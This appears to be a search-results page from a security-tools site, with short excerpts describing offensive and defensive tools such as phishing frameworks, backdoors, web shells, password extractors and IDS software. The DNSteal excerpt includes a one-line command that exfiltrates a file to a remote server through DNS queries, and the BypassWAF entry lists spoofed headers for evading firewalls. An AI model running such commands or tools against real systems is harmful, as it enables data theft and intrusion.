6011 matches found
TP-Link-defaults - Python Script For Trying Default Passwords For Some TP-Link Hotspots
Python script for trying default passwords for some TP-Link Hotspots Inspired by Usage usage: scan.py -h -p Python script for trying default passwords for some TP-Link Hotspots optional arguments: -h, --help show this help message and exit -p, --print-all print all found ssid's FOR EDUCATIONAL US...
Hash-Buster v2.0 - Tool Which Uses Several APIs To Perform Hash Lookups
Features Automatic hash type identification Supports MD5, SHA1, SHA2 Can extract & crack hashes from a file Can find hashes from a directory, recursively 6 robust APIs As powerful as Hulk, as intelligent as Bruce Banner Single Hash You don't need to specify the hash type. Hash Buster will identif...
DumpsterDiver - Tool To Search Secrets In Various Filetypes
DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secret keys e.g. AWS Access Key, Azure Share Key or SSH keys. Additionally, it allows creating a simple search rules with basic conditions e.g. reports only csv file including at least 10 email...
Honeybits - A Simple Tool Designed To Enhance The Effectiveness Of Your Traps By Spreading Breadcrumbs & Honeytokens Across Your Systems
A simple tool designed to enhance the effectiveness of your traps by spreading breadcrumbs & honeytokens across your production servers and workstations to lure the attacker toward your honeypots. Author: Adel "0x4D31" Karimi. Background The problem with the traditional implementation of honeypot...
Whonow - A "Malicious" DNS Server For Executing DNS Rebinding Attacks On The Fly (Public Instance Running On Rebind.Network:53)
A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves. respond to DNS queries for this domain with 52.23.194.42 the first time it is requested and then 192.168.1.1 every time after...
Wordpress Exploit Framework v1.9.2 - Framework For Developing And Using Modules Which Aid In The Penetration Testing Of WordPress Powered Websites And Systems
A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. What do I need to run it? Ensure that you have Ruby = 2.4.3 installed on your system and then install all required dependencies by opening a command prompt / terminal ...
JShielder - Automates The Process Of Installing All The Necessary Packages To Host A Web Application And Hardening A Linux Server
JSHielder is an Open Source tool developed to help SysAdmin and developers secure there Linux Servers in which they will be deploying any web application or services. This tool automates the process of installing all the necessary packages to host a web application and Hardening a Linux server wi...
Altdns - Generates permutations, alterations and mutations of subdomains and then resolves them
Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain such as test, dev, staging as well as takes in a list of subdomains that you know of. From these two lists that are provided as...
Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy
Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers although probably also useful for sysadmins which sifts through the usually very noisy XML output from the Get-GPOReport cmdlet part of Microsoft's Group Policy module and identifies all the settings defined in...
Meltdown Exploit PoC
Speculative optimizations execute code in a non-secure manner leaving data traces in microarchitecture such as cache. Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/meltdown.pdf. Can only dump linuxprocbanner at the moment, since requires accessed memory to be in...
certstreamcatcher - Catching phishing by observing certificate transparency logs
Catching phishing by observing certificate transparency logs. This tool is based on regex with effective standards for detecting phishing sites in real time using certstream. Installation $ cd /opt/ $ git clone https://github.com/6IX7ine/certstreamcatcher.git $ cd certstreamcatcher $ npm install...
Breacher - Tool To Find Admin Login Pages And EAR Vulnerabilites
A script to find admin login pages and EAR vulnerabilites. Features Multi-threading on demand Big path list 798 paths Supports php, asp and html extensions Checks for potential EAR vulnerabilites Checks for robots.txt Support for custom patns Usages Check all paths with php extension python...
TorWall - Transparent Tor for Windows
Tallow is a small program that redirects all outbound traffic from a Windows machine via the Tor anonymity network. Any traffic that cannot be handled by Tor, e.g. UDP, is blocked. Tallow also intercepts and handles DNS requests preventing potential leaks. Tallow has several applications,...
Python Taint - A Static Analysis Tool for Detecting Security Vulnerabilities in Python Web Applications
Static analysis of Python web applications based on theoretical foundations Control flow graphs, fixed point, dataflow analysis Features Detect Command injection Detect SQL injection Detect XSS Detect directory traversal Get a control flow graph Get a def-use and/or a use-def chain Search GitHub...
CookieCatcher - Tool to assist in the exploitation of XSS
CookieCatcher is an open source application which was created to assist in the exploitation of XSS Cross Site Scripting vulnerabilities within web applications to steal user session IDs aka Session Hijacking. The use of this application is purely educational and should not be used without proper...
SET v7.7 - The Social-Engineer Toolkit “Blackout”
The Social-Engineer Toolkit SET was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two...
Radio Hack Box - Tool to Demonstrate Vulnerabilities in Wireless Input Devices
The SySS Radio Hack Box is a proof-of-concept software tool to demonstrate the replay and keystroke injection vulnerabilities of the wireless keyboard Cherry B.Unlimited AES. Requirements Raspberry Pi Raspberry Pi Radio Hack Box shield a LCD, some LEDs, and some buttons nRF24LU1+ USB radio dongle...
FiercePhish - A Full-Fledged Phishing Framework To Manage All Phishing Engagements
FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. The features will continue to be expanded and will include website spoofing, click tracking, and extensive notificati...
PsTools - Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more
The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more. Introduction The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that...
hget - Rocket Fast, Interruptable, Resumable Download Accelerator
Rocket fast download accelerator written in golang. Current program working in unix system only. NOTE : hget is currently on highly development, its usage, architecture and code may change anytime at the future. It would be great if you can contribute whatever features that you want to use, I wil...
Cartero - Social Engineering Framework
A robust Phishing Framework with a full featured CLI interface. The project was born out necessity through of years of engagements with tools that just didn't do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and...
sshhipot - High-Interaction MitM SSH Honeypot
High-interaction SSH honeypot ok, it's really a logging ssh proxy. Still more or less a work-in-progress. Feel free to go install this repository if you'd like to try it. Run it with -h to see more options. In particular, logging is kinda rough. One of these days there'll be better documentation,...
Fierce - A DNS Reconnaissance Tool for Locating Non-Contiguous IP Space
First, credit where credit is due, fierce was originally written by RSnake along with others at http://ha.ckers.org/ . This is simply a conversion to Python 3 to simplify and modernize the codebase. The original description was very apt, so I'll include it here: Fierce is a semi-lightweight scann...
lisa.py - An Exploit Dev Swiss Army Knife
lisa.py An Exploit Dev Swiss Army Knife. Installation Copy lisa.py and .lldbinit to / Use the following commands: ant4g0nist$ cp lisa.py /lisa.py ant4g0nist$ cp lldbinit /.lldbinit ant4g0nist$ lldb lllllll iiii l:::::l i::::i l:::::l iiii l:::::l l::::l iiiiiii ssssssssss aaaaaaaaaaaaa l::::l...
V3n0M-Scanner - Popular SQLi and Pentesting Scanner
V3n0M runs on Python3 Live Project - Readding old features back in and improved for Python3 v3n0m is a free and open source scanner. Evolved from baltazar's scanner, it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is fo...
credmap - The Credential Mapper
Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these. Help Menu Usage: credmap.py --email EMAIL | --user USER |...
Katana - Framework for Hackers, Professional Security and Developers
Katana is a framework written in python for making penetration testing, based on a simple and comprehensive structure for anyone to use, modify and share, the goal is to unify tools serve for professional when making a penetration test or simply as a routine tool, The current version is not...
GetHead - HTTP Header Analysis Vulnerability Tool
gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP Headers. Usage: $ python gethead.py http://domain.com Changelog Version 0.1 - Initial Release Written in Python 2.7.5 Performs HTTP Header Analysis Reports...
KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory
KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData% General Design KeeFarce uses DLL injection to execute code within the context of a runnin...
DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...
Wfuzz - The Web Application Bruteforcer
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked directories, servlets, scripts, etc, bruteforce GET and POST parameters for checking different kind of injections SQL, XSS, LDAP,etc, bruteforce Forms parameters User/Password, Fuzzing,etc...
Empire - PowerShell Post-Exploitation Agent
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz,...
Gcat - A stealthy Backdoor that uses Gmail as a command and control server
A stealthy Python based backdoor that uses Gmail as a command and control server. Setup For this to work you need: A Gmail account Use a dedicated account! Do not use your personal one! Turn on "Allow less secure apps" under the security settings of the account This repo contains two files: gcat....
Cupp - Common User Passwords Profiler
The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the passwo...
BypassWAF - Burp Plugin to Bypass Some WAF Devices
Add headers to all Burp requests to bypass some WAF products. This extension will automatically add the following headers to all requests. X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Usage Steps include: 1. Add extension to burp 2. Create...
BlueScreenView - Blue Screen of Death (STOP error) information in dump files
BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue...
DAws - Advanced Web Shell (Windows/Linux)
There's multiple things that makes DAws better than every Web Shell out there: 1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shellexec was disabled it would automatically use exec or passthru or...
Instant PDF Password Protector - Password Protect PDF file
Instant PDF Password Protector is the Free tool to quickly Password Protect PDF file on your system. With a click of button, you can lock or protect any of your sensitive/private PDF documents. You can also use any of the standard Encryption methods - RC4/AES 40-bit, 128-bit, 256-bit based upon t...
Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)
Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch. Features Support multiple packet processing threads Shared configuration and attribute table Use a...
THC-Hydra 8.1 - Network Logon Cracker
A very fast network logon cracker which support many different services. See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept...
sb0x-project - A simple and Lightweight framework for Penetration testing
sb0x-project is A Lightweight Framework for PenTesting Written in Python Platforms: Linux BSD "Or Unix System" Download sb0x...
Liffy - Local File Inclusion Exploitation Tool
Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension call...
BlackArch Linux v2014.04.21 - Lightweight expansion to Arch Linux for pentesters and security researchers
BlackArch Linux is an Arch-based GNU/Linux distribution for pentesters and security researchers. The BlackArch package repository is compatible with existing Arch installs. Changelog v2014.04.21 added new system packages: mplayer, abs, ack, bc, bridge-utils, darkhttpd, flashplugin, inotify-tools,...
Linkedin Password Decryptor - Linkedin Password Recovery Software
Linkedin Password Decryptor is the all-in-one software to recover Linkedin passwords stored by popular Web Browsers. These days, most of the web browsers store the website login passwords to prevent hassale of entering the password again and again. Each web browser use their own encryption...
[SearchMyFiles] Alternative to 'Search For Files And Folders' module of Windows + Duplicates Search
SearchMyFiles is an alternative to the standard "Search For Files And Folders" module of Windows. It allows you to easily search files in your system by wildcard, by last modified/created/last accessed time, by file attributes, by file content text or binary search, and by the file size...
[wig] WebApp Information Gatherer (Identify CMS)
wig is a Python tool that identifies a websites CMS by searching for fingerprints of static files and extracting version numbers from known files. OS identification is done by using the value of the ‘server’ and ‘X-Powered-By’ in the response header. These values are compared to a database of whi...
[Browser Password Dump v2.0] Command-line Tool to Recover Login Password from Web Browsers
Browser Password Dump is the free command-line tool to instantly recover your lost password from all the popular web browsers. Currently it can recover stored web login passwords from following browsers. Firefox Internet Explorer Google Chrome Chrome Canary/SXS CoolNovo Browser Opera Browser Appl...
[Router Password Decryptor v2.0] Recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file
Router Password Decryptor is the FREE tool to instantly recover internet login/PPPoE authentication passwords, Wireless WEP keys, WPA/WPA2 Passphrases from your Router/Modem configuration file. Currently it supports password recovery from following type of Routers/Modems Cisco Juniper DLink BSNL ...
[Xplico 1.1.0] Open Source Network Forensic Analysis Tool (NFAT)
The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email POP, IMAP, and SMTP protocols, all HTTP contents, each VoIP call SIP, FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is ...
[Wapiti 2.3.0] Web Application Vulnerability Scanner
Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti act...